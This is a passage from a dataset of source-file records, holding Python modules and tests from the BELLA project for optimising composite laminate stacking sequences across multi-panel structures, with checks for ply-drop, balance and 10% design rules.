multi-panel structure to a\r\n blending strip, i.e. a series a panels in a row\r\n \"\"\"\r\n self.reduced = ReducedMultiPanel(self, constraints, n_plies_ref_panel)\r\n\r\n\r\n def calc_panel_boundary_dict(self, panels, boundary_weights):\r\n \"\"\"\r\n checks that all panels have a different ID\r\n collates all the panel boundaries in self.boundaries\r\n checks that all panels are connected\r\n \"\"\"\r\n ## checks that all panels have a different ID\r\n self.dict_ID_to_indices = dict()\r\n for ind_panel, panel in enumerate(panels):\r\n panel.ID_code = ind_panel\r\n self.dict_ID_to_indices[panel.ID] = ind_panel\r\n if len(self.dict_ID_to_indices) != self.n_panels:\r\n raise MultiPanelDefinitionError(\"\"\"\r\nSeveral panels with the same index!\"\"\")\r\n# print('dict_ID_to_indices', self.dict_ID_to_indices)\r\n\r\n ## create the dictionary of panel boundaries\r\n self.boundaries = []\r\n for ind_panel, panel in enumerate(panels):\r\n neighbours = [self.dict_ID_to_indices[neighbour] \\\r\n for neighbour in panel.neighbour_panels]\r\n for elem in neighbours:\r\n self.boundaries.append(np.sort([ind_panel, elem]))\r\n self.boundaries.append(np.flip(np.sort([ind_panel, elem])))\r\n if len(self.boundaries) == 0:\r\n self.boundaries = np.array((), int).reshape((0,2))\r\n else:\r\n self.boundaries = np.unique(self.boundaries, axis=0)\r\n# print('boundaries', self.boundaries)\r\n\r\n ## checks that all panels are connected\r\n visited_nodes = []\r\n set_avail_nodes = set([0])\r\n while len(set_avail_nodes) != 0 and len(visited_nodes) < self.n_panels:\r\n current_node = set_avail_nodes.pop()\r\n visited_nodes.append(current_node)\r\n for elem in self.boundaries:\r\n if elem[0] == current_node and elem[1] not in visited_nodes\\\r\n and elem[1] not in set_avail_nodes:\r\n set_avail_nodes.add(elem[1])\r\n# print('visited_nodes', visited_nodes)\r\n if not len(visited_nodes) == self.n_panels:\r\n raise MultiPanelDefinitionError(\"\"\"\r\nThe panels of the multipanel-component are not all connected!\"\"\")\r\n\r\n if len(self.boundaries) == 0:\r\n self.boundaries = np.array((), int).reshape((0,2))\r\n else:\r\n self.boundaries = np.unique(\r\n np.array([np.sort(elem) for elem in self.boundaries]), axis=0)\r\n# print('boundaries', self.boundaries)\r\n\r\n ## dictionary with panel Ids\r\n self.boundaries_in_IDs = np.empty((self.boundaries.shape[0], 2), int)\r\n for ind_row, (first, second) in enumerate(self.boundaries):\r\n self.boundaries_in_IDs[ind_row, 0] = self.panels[first].ID\r\n self.boundaries_in_IDs[ind_row, 1] = self.panels[second].ID\r\n\r\n\r\n ## reorganise the boundary weightings\r\n self.boundary_weights_in_IDs = dict()\r\n self.boundary_weights = dict()\r\n if boundary_weights is not None:\r\n\r\n for weight in boundary_weights.values():\r\n if weight < 0:\r\n raise Exception(\r\n 'The boundary weightings should be positive.')\r\n\r\n if len(boundary_weights) < self.boundaries.shape[0]:\r\n print(len(boundary_weights), self.boundaries)\r\n raise Exception(\r\n 'Insufficient number of boundary weightings.')\r\n\r\n for ind_panel1, ind_panel2 in self.boundaries_in_IDs:\r\n ind_panel1_mod = self.dict_ID_to_indices[ind_panel1]\r\n ind_panel2_mod = self.dict_ID_to_indices[ind_panel2]\r\n ind_panel1, ind_panel2 = sorted((ind_panel1, ind_panel2))\r\n ind_panel1_mod, ind_panel2_mod = sorted((ind_panel1_mod,\r\n ind_panel2_mod))\r\n weight = boundary_weights.get((ind_panel1, ind_panel2), None)\r\n if weight:\r\n self.boundary_weights_in_IDs[\r\n (ind_panel1, ind_panel2)] = weight\r\n self.boundary_weights[\r\n (ind_panel1_mod, ind_panel2_mod)] = weight\r\n else:\r\n weight = boundary_weights.get(\r\n (ind_panel2, ind_panel1), None)\r\n if not weight:\r\n raise Exception('Missing boundary weightings.')\r\n self.boundary_weights_in_IDs[\r\n (ind_panel2, ind_panel1)] = weight\r\n self.boundary_weights[\r\n (ind_panel2_mod, ind_panel1_mod)] = weight\r\n\r\n else: # all boundary weightings set to one\r\n for ind_panel1, ind_panel2 in self.boundaries_in_IDs:\r\n ind_panel1_mod = self.dict_ID_to_indices[ind_panel1]\r\n ind_panel2_mod = self.dict_ID_to_indices[ind_panel2]\r\n ind_panel1, ind_panel2 = sorted((ind_panel1, ind_panel2))\r\n ind_panel1_mod, ind_panel2_mod = sorted((ind_panel1_mod,\r\n ind_panel2_mod))\r\n self.boundary_weights_in_IDs[(ind_panel1, ind_panel2)] = 1\r\n self.boundary_weights[(ind_panel1_mod, ind_panel2_mod)] = 1\r\n\r\n return 0\r\n\r\n def has_a_middle_ply(self):\r\n \"\"\"\r\n returns:\r\n - middle_ply_indices: the locations of middle plies per panel\r\n (0 if no middle ply)\r\n - has_middle_ply: True if one panel at least has a middle ply\r\n - thick_panel_has_middle_ply: True if thickest panel has a middle\r\n ply\r\n \"\"\"\r\n # locations of middle plies per panel (0 if no middle ply)\r\n self.middle_ply_indices = np.array(\r\n [self.panels[ind_panel].middle_ply_index \\\r\n for ind_panel in range(self.n_panels)])\r\n self.has_middle_ply = bool(sum(self.middle_ply_indices))\r\n\r\n if self.has_middle_ply and self.n_plies_max % 2:\r\n self.thick_panel_has_middle_ply = True\r\n else:\r\n self.thick_panel_has_middle_ply = False\r\n\r\n\r\n def calc_ply_drops(self, inner_step):\r\n \"\"\"\r\n returns a vector of the number of ply drops at each panel boundary of\r\n the blending strip for the inner_step-eme group of plies\r\n \"\"\"\r\n n_ply_drops = np.zeros((self.reduced.n_panels,), dtype='int16')\r\n for index, panel in enumerate(self.reduced.panels):\r\n n_ply_drops[index] = self.reduced.n_plies_per_group[inner_step] \\\r\n - panel.n_plies_per_group[inner_step]\r\n return n_ply_drops\r\n\r\n def calc_weight(self, density_area):\r\n \"\"\"\r\n returns the weight of the multipanel structure\r\n \"\"\"\r\n return density_area*sum([panel.area*panel.n_plies \\\r\n for panel in self.panels])\r\n\r\n def calc_weight_per_panel(self, density_area):\r\n \"\"\"\r\n returns the weight of the multipanel structure per panel\r\n \"\"\"\r\n self.weight_ref_per_panel = density_area * \\\r\n np.array([panel.area*panel.n_plies for panel in self.panels])\r\n\r\n def calc_weight_from_sst(self, sst, density_area):\r\n \"\"\"\r\n returns the weight of the multipanel structure from a stacking sequence\r\n table\r\n \"\"\"\r\n return density_area*sum([panel.area * sum(sst[ind_panel] != -1) \\\r\n for ind_panel,\r\n panel in enumerate(self.panels)])\r\n\r\n\r\n def identify_neighbour_panels(self):\r\n \"\"\"\r\n returns the indices of the neighbouring panels for each panel\r\n \"\"\"\r\n liste = []\r\n for ind_panel in range(self.n_panels):\r\n liste.append([])\r\n for boundary in self.boundaries:\r\n liste[boundary[0]].append(boundary[1])\r\n liste[boundary[1]].append(boundary[0])\r\n return liste\r\n\r\n\r\n def identify_one_thickest_panel(self):\r\n \"\"\"\r\n returns the index of one of the thickest panels\r\n \"\"\"\r\n for ind_panel, panel in enumerate(self.panels):\r\n if panel.n_plies == self.n_plies_max:\r\n self.ind_thick = ind_panel\r\n return 0\r\n raise Exception(\"\"\"\r\nThe maximum number of plies should be the ply count of a panel\"\"\")\r\n\r\n\r\n def identify_thickest_panels(self, sym=False):\r\n \"\"\"\r\n returns the index of all of the thickest panels\r\n \"\"\"\r\n liste = []\r\n if sym and self.n_plies_max % 2 == 1: # midlle ply in thickest panels\r\n for ind_panel, panel in enumerate(self.panels):\r\n if panel.n_plies == self.n_plies_max \\\r\n or panel.n_plies == self.n_plies_max - 1:\r\n liste.append(ind_panel)\r\n else:\r\n for ind_panel, panel in enumerate(self.panels):\r\n if panel.n_plies == self.n_plies_max:\r\n liste.append(ind_panel)\r\n if liste:\r\n return liste\r\n raise Exception(\"\"\"\r\nThe maximum number of plies should be the ply count of a panel\"\"\")\r\n\r\n\r\n def __repr__(self):\r\n \" Display object \"\r\n\r\n to_add = ''\r\n # number of groups\r\n if hasattr(self, 'n_groups'):\r\n to_add = to_add + 'Number of groups : ' + str(self.n_groups) \\\r\n + '\\n'\r\n # number of plies per group for thickest laminates\r\n if hasattr(self, 'n_plies_per_group'):\r\n to_add = to_add + 'Max number of plies per group : ' \\\r\n + str(self.n_plies_per_group) + '\\n'\r\n # position of the group first plies for thickest laminates\r\n if hasattr(self, 'n_first_plies'):\r\n to_add = to_add + 'Position first plies : ' \\\r\n + str(self.n_first_plies) + '\\n'\r\n\r\n return f\"\"\"\r\nNumber of panels : {self.n_panels}\r\nMaximum number of plies in a panel: {self.n_plies_max}\r\nIndex of one of the thickest panels: {self.ind_thick}\r\nArea : {self.area}\r\nArea for all patches: {self.area_patches}\r\nPanel boundary matrix : {self.boundaries_in_IDs}\r\n\"\"\" + to_add\r\n\r\n\r\nclass MultiPanelDefinitionError(Exception):\r\n \" Errors during the definition of a multi-panel structure\"\r\n\r\nif __name__ == \"__main__\":\r\n print('*** Test for the class MultiPanel ***\\n')\r\n constraints = Constraints(\r\n sym=True,\r\n dam_tol=False,\r\n covering=False,\r\n pdl_spacing=True,\r\n min_drop=2)\r\n parameters = Parameters(constraints=constraints, n_plies_ref_panel=48)\r\n n_plies_target1 = 48\r\n n_plies_target2 = 46\r\n n_plies_target3 = 40\r\n n_plies_target4 = 40\r\n panel1 = Panel(ID=1,\r\n n_plies=n_plies_target1,\r\n constraints=constraints,\r\n neighbour_panels=[2])\r\n panel2 = Panel(ID=2,\r\n n_plies=n_plies_target2,\r\n constraints=constraints,\r\n neighbour_panels=[1, 3])\r\n panel3 = Panel(ID=3,\r\n n_plies=n_plies_target3,\r\n constraints=constraints,\r\n neighbour_panels=[2, 4])\r\n panel4 = Panel(ID=4,\r\n n_plies=n_plies_target4,\r\n constraints=constraints,\r\n neighbour_panels=[3])\r\n multipanel = MultiPanel([panel1, panel2, panel3, panel4])\r\n print(multipanel)\r\n\r\n from src.BELLA.divide_panels import divide_panels\r\n divide_panels(multipanel, parameters, constraints)\r\n\r\n print('multipanel.reduced.n_plies_in_panels', multipanel.reduced.n_plies_in_panels)\r\n print('multipanel.calc_ply_drops(0)', multipanel.calc_ply_drops(0))\r\n print('multipanel.reduced.n_plies_per_group', multipanel.reduced.n_plies_per_group)\r\n print('multipanel.reduced.middle_ply_indices', multipanel.reduced.middle_ply_indices)"
},
{
"alpha_fraction": 0.5907504558563232,
"alphanum_fraction": 0.5933682322502136,
"avg_line_length": 37.79166793823242,
"blob_id": "6ed7e2a249a243980e92485aab43b6926158b581",
"content_id": "da9370a5a85d725a088375a574aafa7bfbb5974f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5730,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 144,
"path": "/src/BELLA/results_with_one_pdl.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nClass for the results of an optimisation with BELLA\r\nwith one initial ply-drop layout\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\n#import sys\r\n#sys.path.append(r'C:\\BELLA')\r\n#from src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\n\r\nclass BELLA_Results():\r\n \" An object for storing the results of an optimisation with BELLA\"\r\n\r\n def __init__(self, parameters, constraints, multipanel):\r\n \"Initialise the results of an optimisation with BELLA\"\r\n self.obj_constraints_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops,), dtype=float)\r\n self.obj_no_constraints_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops, multipanel.n_panels), dtype=float)\r\n\r\n self.penalty_contig_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops, multipanel.n_panels), dtype=float)\r\n\r\n self.penalty_diso_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops, multipanel.n_panels), dtype=float)\r\n\r\n self.penalty_10_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops, multipanel.n_panels), dtype=float)\r\n\r\n self.penalty_bal_ipo_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops, multipanel.n_panels), dtype=float)\r\n\r\n self.penalty_oopo_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops, multipanel.n_panels), dtype=float)\r\n\r\n self.n_contig_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops, multipanel.n_panels), dtype=int)\r\n\r\n self.n_diso_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops, multipanel.n_panels), dtype=int)\r\n\r\n self.n_obj_func_calls_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops,), int)\r\n\r\n self.n_designs_last_level_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops,), int)\r\n\r\n self.n_designs_after_ss_ref_repair_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops,), int)\r\n\r\n self.n_designs_after_thick_to_thin_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops,), int)\r\n\r\n self.n_designs_after_thin_to_thick_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops,), int)\r\n\r\n self.n_designs_repaired_unique_tab = np.NaN*np.ones((\r\n parameters.n_ini_ply_drops,), int)\r\n\r\n self.lampam_tab_tab = np.zeros((\r\n multipanel.n_panels, parameters.n_ini_ply_drops, 12), float)\r\n\r\n self.n_plies_per_angle_tab = np.zeros((\r\n parameters.n_ini_ply_drops, multipanel.n_panels,\r\n constraints.n_set_of_angles), float)\r\n\r\n # Initialisation of the array storing all the best stacking sequence\r\n # solutions: ss_void\r\n ss_void = []\r\n for panel in multipanel.panels:\r\n ss_void.append(np.zeros((panel.n_plies,), dtype=int))\r\n # Initialisation of the array storing all the stacking sequence solutions:\r\n # ss_tab\r\n self.ss_tab = [[]]*(parameters.n_ini_ply_drops)\r\n for outer_step in range(parameters.n_ini_ply_drops):\r\n self.ss_tab[outer_step] = ss_void\r\n # Initialisation of the array storing all the stacking sequence tables:\r\n # ss_tab_tab\r\n if constraints.sym \\\r\n and multipanel.n_plies_max % 2 == 0 \\\r\n and sum([p.middle_ply for p in multipanel.panels]) != 0:\r\n self.ss_tab_tab = np.zeros((\r\n parameters.n_ini_ply_drops,\r\n multipanel.n_panels,\r\n multipanel.n_plies_max + 1), dtype=int)\r\n else:\r\n self.ss_tab_tab = np.zeros((\r\n parameters.n_ini_ply_drops,\r\n multipanel.n_panels,\r\n multipanel.n_plies_max), dtype=int)\r\n\r\n def update(self, outer_step, results_one_pdl):\r\n \"Update the results from an optimisation with one ply-drop layout\"\r\n self.ss_tab[outer_step] = results_one_pdl.ss\r\n self.ss_tab_tab[outer_step] = results_one_pdl.sst\r\n\r\n self.lampam_tab_tab[:, outer_step, :] = results_one_pdl.lampam\r\n\r\n self.obj_constraints_tab[\r\n outer_step] = results_one_pdl.obj_constraints\r\n self.obj_no_constraints_tab[\r\n outer_step] = results_one_pdl.obj_no_constraints\r\n\r\n self.penalty_diso_tab[\r\n outer_step] = results_one_pdl.penalty_diso\r\n self.penalty_contig_tab[\r\n outer_step] = results_one_pdl.penalty_contig\r\n self.penalty_10_tab[\r\n outer_step] = results_one_pdl.penalty_10\r\n self.penalty_bal_ipo_tab[\r\n outer_step] = results_one_pdl.penalty_bal_ipo\r\n self.penalty_oopo_tab[\r\n outer_step] = results_one_pdl.penalty_oopo\r\n self.n_diso_tab[outer_step] = results_one_pdl.n_diso\r\n self.n_contig_tab[outer_step] = results_one_pdl.n_contig\r\n\r\n self.n_plies_per_angle_tab[\r\n outer_step] = results_one_pdl.n_plies_per_angle\r\n\r\n self.n_obj_func_calls_tab[\r\n outer_step] = results_one_pdl.n_obj_func_calls\r\n self.n_designs_last_level_tab[\r\n outer_step] = results_one_pdl.n_designs_last_level\r\n self.n_designs_after_ss_ref_repair_tab[\r\n outer_step] = results_one_pdl.n_designs_after_ss_ref_repair\r\n self.n_designs_after_thick_to_thin_tab[\r\n outer_step] = results_one_pdl.n_designs_after_thick_to_thin\r\n self.n_designs_after_thin_to_thick_tab[\r\n outer_step] = results_one_pdl.n_designs_after_thin_to_thick\r\n self.n_designs_repaired_unique_tab[\r\n outer_step] = results_one_pdl.n_designs_repaired_unique\r\n\r\n def __repr__(self):\r\n \" Display object \"\r\n\r\n return f'''\r\nResults with BELLA:\r\n\r\n***\r\n'''\r\n"
},
{
"alpha_fraction": 0.5586318969726562,
"alphanum_fraction": 0.5936481952667236,
"avg_line_length": 30.3157901763916,
"blob_id": "d1bf583742e26717a38a4f68e6fddc62ae78705c",
"content_id": "3c7fdccbad424acff2b8f7654accf1de805e6ba4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1228,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 38,
"path": "/src/guidelines/test_balance.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# - * - coding: utf - 8 - * -\r\n\"\"\"\r\nThis module tests the functions in balance.py.\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport pytest\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.LAYLA_V02.constraints import Constraints\r\nfrom src.guidelines.balance import is_balanced\r\nfrom src.guidelines.balance import calc_penalty_bal\r\n\r\[email protected](\r\n \"stack, constraints, expect\", [\r\n (np.array([0, 45, 90]), Constraints(), False),\r\n (np.array([0, 45, 90, -45]), Constraints(), True)\r\n ])\r\n\r\ndef test_is_balanced(stack, constraints, expect):\r\n output = is_balanced(stack, constraints)\r\n assert output == expect\r\n\r\[email protected](\r\n \"n_plies_per_angle, constraints, cummul_areas, expect\", [\r\n (np.array([0, 0, 1, 0]), Constraints(), 1, 1.),\r\n (np.array([0, 0, 2, 0]), Constraints(), 0.5, 0.5),\r\n (np.array([[0, 0, 2, 0],\r\n [0, 2, 2, 0]]), Constraints(), 1, np.array([1., 0.5]))\r\n ])\r\n\r\ndef test_calc_penalty_bal(\r\n n_plies_per_angle, constraints, cummul_areas, expect):\r\n output = calc_penalty_bal(n_plies_per_angle, constraints, cummul_areas)\r\n assert (output == expect).all()\r\n"
},
{
"alpha_fraction": 0.5575239062309265,
"alphanum_fraction": 0.5909183621406555,
"avg_line_length": 35.761539459228516,
"blob_id": "c186cf2638dd1370a7fc2dc5e11566d28380b3e9",
"content_id": "789876a9cf608e8050fe0b341c90f965ece6ee0c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4911,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 130,
"path": "/src/guidelines/one_stack.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions to check a design manufacturability\r\n\r\n- check_lay_up_rules\r\n checks the manufacturability of a stacking sequence list\r\n\r\n- check_ply_drop_rules\r\n checks the manufacturability of a stacking sequence table regarding\r\n the covering rule and the ply drop spacing rule\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.guidelines.contiguity import is_contig\r\nfrom src.guidelines.disorientation import is_diso_ss\r\nfrom src.guidelines.balance import is_balanced\r\nfrom src.guidelines.dam_tol import is_dam_tol\r\nfrom src.guidelines.ten_percent_rule import is_ten_percent_rule\r\nfrom src.guidelines.ply_drop_spacing import calc_penalty_spacing\r\nfrom src.CLA.lp_functions_2 import calc_lampamA\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.divers.pretty_print import print_ss, print_list_ss\r\n\r\ndef check_lay_up_rules(\r\n ss, constraints, no_ipo_check=False, no_bal_check=False,\r\n equality_45_135=False, equality_0_90=False, n_plies=None):\r\n \"\"\"\r\n checks the manufacturability of a stacking sequence\r\n \"\"\"\r\n if n_plies is not None and ss.size != n_plies:\r\n raise Exception(\"Wrong number of plies\")\r\n\r\n if constraints.dam_tol:\r\n if not is_dam_tol(ss, constraints):\r\n print_ss(ss)\r\n raise Exception(\"Damage tolerance constraint not satisfied\")\r\n\r\n if not no_bal_check and constraints.bal:\r\n if not is_balanced(ss, constraints):\r\n raise Exception(\"Balance constraint not satisfied\")\r\n\r\n if not no_ipo_check and constraints.ipo:\r\n lampamA = calc_lampamA(ss, constraints)\r\n if (abs(lampamA[2:4]) > 1e-10).any():\r\n print_ss(ss)\r\n print('lampamA', lampamA)\r\n# print('ipo')\r\n raise Exception(\"In plane orthotropy constraint not satisfied\")\r\n\r\n if constraints.diso:\r\n if hasattr(constraints, 'dam_tol_rule'):\r\n if not is_diso_ss(ss, constraints.delta_angle,\r\n constraints.dam_tol, constraints.dam_tol_rule):\r\n raise Exception(\"Disorientation constraint not satisfied\")\r\n else:\r\n if not is_diso_ss(ss, constraints.delta_angle,\r\n constraints.dam_tol, constraints.n_plies_dam_tol):\r\n raise Exception(\"Disorientation constraint not satisfied\")\r\n\r\n if constraints.contig:\r\n if not is_contig(ss, constraints.n_contig):\r\n raise Exception(\"Contiguity constraint not satisfied\")\r\n\r\n if constraints.rule_10_percent:\r\n if not is_ten_percent_rule(\r\n constraints, stack=ss,\r\n equality_45_135=equality_45_135,\r\n equality_0_90=equality_0_90):\r\n raise Exception(\"10% rule not satisfied\")\r\n return 0\r\n\r\ndef check_ply_drop_rules(reduced_sst, multipanel, constraints, reduced=True):\r\n \"\"\"\r\n checks the manufacturability of a stacking sequence table regarding\r\n the covering rule and the ply drop spacing rule\r\n\r\n reduced = True if the function is applied to the blending strip\r\n \"\"\"\r\n if constraints.covering:\r\n if (reduced_sst[:, 0] == -1).any() or (reduced_sst[:, -1] == -1).any():\r\n raise Exception(\"Covering constraint not satisfied\")\r\n\r\n if constraints.pdl_spacing:\r\n if reduced:\r\n penalty_spacing = calc_penalty_spacing(\r\n pdl=reduced_sst,\r\n multipanel=multipanel,\r\n constraints=constraints,\r\n on_blending_strip=True)\r\n else:\r\n penalty_spacing = calc_penalty_spacing(\r\n pdl=reduced_sst,\r\n multipanel=multipanel,\r\n constraints=constraints,\r\n on_blending_strip=False)\r\n if penalty_spacing:\r\n# print('penalty_spacing', penalty_spacing)\r\n# print_list_ss(reduced_sst[:, :reduced_sst.shape[1]])\r\n raise Exception(\"Ply drop spacing rule not satisfied\")\r\n return 0\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n print('\\n*** Test for the function check_lay_up_rules ***')\r\n constraints = Constraints(\r\n sym=True,\r\n bal=True,\r\n oopo=False,\r\n dam_tol=False,\r\n rule_10_percent=True,\r\n percent_0=10,\r\n percent_45=0,\r\n percent_90=10,\r\n percent_135=0,\r\n percent_45_135=10,\r\n diso=True,\r\n contig=True,\r\n n_contig=5,\r\n delta_angle=45,\r\n set_of_angles=np.array([0, 45, -45, 90]))\r\n ss = np.array([ 90, -45, 0, 45, 90, -45, 0, 45, 90, -45, 0, 45, 90,\r\n -45, 0, 45, 90, -45, 0, 45, 45, 0, 0, -45, 90, 90,\r\n 45, 45, 0, -45, -45, 90, 45, 0, -45, 90, 90, 45, 45,\r\n 0, 0, -45, 90, 90, 45, 0, 0, -45, -45, 90], float)\r\n check_lay_up_rules(ss, constraints)\r\n\r\n"
},
{
"alpha_fraction": 0.5773396492004395,
"alphanum_fraction": 0.6131629943847656,
"avg_line_length": 31.654205322265625,
"blob_id": "0f175623b895e896304f65db052ab5ead553591b",
"content_id": "2ebb91b4b95f420c756b6ed791dd2a0844b8ab6c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3601,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 107,
"path": "/src/guidelines/ten_percent_rule_Abdalla.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nApplication of the 10% rule for the design of a laminate\r\n\r\n- display_ply_counts\r\n displays the ply counts in each fibre direction for a laminate lay-up\r\n\r\n- is_ten_percent_rule\r\n returns True for a panel stacking sequence satisfying the 10% rule,\r\n False otherwise\r\n\r\n- calc_penalty_10_ss and calc_penalty_10_pc\r\n returns the stacking sequence penalty for 10% rule\r\n\r\n- ten_percent_rule\r\n returns only the stacking sequences that satisfy the 10% rule when added to\r\n plies for which the ply orientations have been previously determined\r\n\r\n- calc_n_plies_per_angle\r\n returns the ply counts in each fibre direction\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\nimport math\r\n\r\ndef calc_distance_2_points(point1, point2):\r\n \"\"\"\r\n calculates the distance between two points in 2D\r\n\r\n Args:\r\n point1: coordinates of point 1\r\n point2: coordinates of point 2\r\n\r\n Returns:\r\n float: distance between point 1 and point 2\r\n\r\n Examples:\r\n >>> calc_distance_2_points([0, 0], [0, 2])\r\n 2\r\n \"\"\"\r\n return np.linalg.norm(point1 - point2, 2)\r\n\r\n\r\ndef calc_distance_Abdalla(LPs, constraints, num=10000):\r\n \"\"\"\r\n calculates the distance between a lamination arameter point and the\r\n feasible lamination-parameter region for the 10% rule of Abdalla\r\n\r\n Args:\r\n LPs: lamination parameters of a laminate\r\n constraints (instance of the class Constraints): set of design\r\n guidelines\r\n num: number of points taken for respresenting the boundaries of the\r\n lamination-parameter feasible region\r\n\r\n Returns:\r\n float: distance between point (LP1, LP2) and the feasible\r\n lamination-parameter region for the 10% rule of Abdalla\r\n\r\n Examples:\r\n >>> constraints=Constraints(rule_10_percent=True, rule_10_Abdalla=True,\r\n percent_Abdalla=10)\r\n >>> calc_distance_Abdalla(LPs=np.array([0, 0]), constraints)\r\n 0\r\n \"\"\"\r\n\r\n if constraints.rule_10_percent and constraints.rule_10_Abdalla:\r\n if math.pow((1 - 4 * constraints.percent_Abdalla), 2) \\\r\n + (1 - 4 * constraints.percent_Abdalla) * LPs[1] \\\r\n - 2 * math.pow(LPs[0], 2) + 1e-15 > 0 \\\r\n and 1 - 4 * constraints.percent_Abdalla - LPs[1] + 1e-15 > 0:\r\n return 0\r\n\r\n LP1_max = math.sqrt(1 - 4 * constraints.percent_Abdalla)\r\n LP1_min = - LP1_max\r\n\r\n def point_parabola_Abdalla(LP1, constraints):\r\n LP2 = 2 * (LP1 / (1 - 4 * constraints.percent_Abdalla)) **2 \\\r\n - (1 - 4 * constraints.percent_Abdalla)\r\n return np.array([LP1, LP2])\r\n\r\n def point_straight_curve_Abdalla(LP1, constraints):\r\n LP2 = 1 - 4 * constraints.percent_Abdalla\r\n return np.array([LP1, LP2])\r\n\r\n\r\n min1 = min((calc_distance_2_points(\r\n LPs[0:2], point_parabola_Abdalla(LP1, constraints)) \\\r\n for LP1 in np.linspace(LP1_min, LP1_max, num)))\r\n\r\n min2 = min((calc_distance_2_points(\r\n LPs[0:2], point_straight_curve_Abdalla(LP1, constraints)) \\\r\n for LP1 in np.linspace(LP1_min, LP1_max, num)))\r\n\r\n return min(min1, min2)\r\n\r\n#import sys\r\n#sys.path.append(r'C:\\BELLA')\r\n#from src.BELLA.constraints import Constraints\r\n#constraints =Constraints(rule_10_percent=True,\r\n# rule_10_Abdalla=True,\r\n# percent_Abdalla=10)\r\n#print(calc_distance_Abdalla(\r\n# np.array([(1 - 4 * constraints.percent_Abdalla)/math.sqrt(2), 0]),\r\n# constraints))\r\n"
},
{
"alpha_fraction": 0.5474771857261658,
"alphanum_fraction": 0.5558555126190186,
"avg_line_length": 42.94560623168945,
"blob_id": "8a798f30c6892b0d076a37dd388a34fe1f2abdcb",
"content_id": "38a48073f1940e93bd8a0da2b0e933c1e630d048",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21484,
"license_type": "permissive",
"max_line_length": 101,
"num_lines": 478,
"path": "/src/BELLA/divide_panels.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions to divide the panels into groups of plies\r\n\r\n- divide_panels\r\n divides the plies of each panel into groups of plies and calculates the\r\n lamination parameter coefficients for the objective functions that accounts\r\n for the normalised positive areas and first and second moments of areas\r\n\r\n- forbidden_ply_counts\r\n determines the ply counts that lead to an impossible partitioning of the\r\n plies into groups of allowed number of plies\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport math as ma\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.parameters import Parameters\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.panels import Panel\r\nfrom src.BELLA.multipanels import MultiPanel\r\n\r\nclass PartitioningError(Exception):\r\n \" Errors occuring during the partition of the panels into groups of plies\"\r\n\r\ndef divide_panels(multipanel, parameters, constraints):\r\n \"\"\"\r\n divides the plies of each panel into groups of plies and calculates the\r\n lamination parameter coefficients for the objective functions that accounts\r\n for the normalised positive areas and first and second moments of areas\r\n\r\n Guidelines:\r\n 1: The first two outer plies should not be stopped\r\n 2: The number of ply drops should be minimal (not butt joints)\r\n 3: The ply drops should be distributed as evenly as possible along the\r\n thickness of the laminates\r\n 4: If this is not exactly possible the ply drops should rather be\r\n concentrated in the larger groups (because smaller groups have a\r\n smaller design space)\r\n 5: Then ply drops away from the middle plane are prefered to limit fibre\r\n waviness\r\n\r\n INPUTS\r\n\r\n - multipanel: multipanel structure\r\n - parameters: optimiser parameters\r\n - constraints: set of design and manufacturing constraints\r\n \"\"\"\r\n #===================\r\n # Division of the thickest panel into groups of plies\r\n #===================\r\n if constraints.sym:\r\n\r\n # evaluate the number of ply orientations for covering plies\r\n n_lam = multipanel.n_plies_max - 2*constraints.n_covering\r\n\r\n mini = 